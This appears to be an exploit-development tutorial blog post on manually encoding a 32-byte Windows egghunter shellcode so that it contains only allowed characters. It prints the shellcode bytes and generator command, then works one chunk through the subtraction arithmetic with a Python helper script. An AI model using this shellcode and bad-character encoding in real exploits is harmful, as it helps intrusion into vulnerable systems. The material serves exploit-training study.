You are probably wondering what this post is all about, well….it’s about manually encoding egghunter shellcode
why would you want to manually encode the shellcode if you have built in encoders in the
metasploit framework ?
What I’m about to show here is the calculations made in order for our shellcode to be bad chars free, well, doing it manually can can be a pain….
Due to large amount of bad characters we need to manually encode the egghunter using a limited allowed set of chars, using python we can have a script doing the calculations for us.
again, I assume you watched the offsec video and read the tutorials and already know what we are about to do here.
Detailed information about egghunters can be found in this document by skape :
or get them compiled to binaries here:
- Title: Egghunter (797 clicks)
Caption: Compiled Egg
Filename: egghunt.exe
Size: 52 kB
- Title: egghunt_syscall (798 clicks)
Caption: Compiled syscall egg
Filename: egghunt_syscall.exe
Size: 52 kB
2. Generate the egghunter shellcode
C:\>egghunt.exe cstyle 0x57303054
// 32 byte egghunt shellcode (egg=0x57303054)
unsigned char egghunt[] = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xe\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";
3. breaking down our 32 byte egghunter shellcode into 8 sets of 4 bytes
"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x54\x30"
"\x30\x57\x8b\xfa"
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7"
4. We will use the following value as an example:
"\x0f\x42\x52\x6a"
0xFFFFFFFF – 0x6a52420f + 1 = 0x95ADBDF1
We need to find three numbers (from the allowed character set) which when added, will give 0x95ADBDF1
Instead of calculating this manually we will use a custom made python script
Now lets split it in two: 95AD, BDF1 and feed these values into our script:
* The script contains a list of allowed chras and will use it for its calculations
exploit~#python encoder.py
Usage: encoder.py <hex value>
exploit~#python encoder.py 95AD
Got It!!
0x7f7f 0x152d 0x0101
exploit~#python encoder.py BDF1
Got It!!
0x7f7f 0x3d71 0x0101
7f7f7f7f
152d3d71
01010101
Let’s add our results and viola, we now have values made from the allowed char set only:
7f7f7f7f + 152d3d71 + 01010101 = 0x95ADBDF1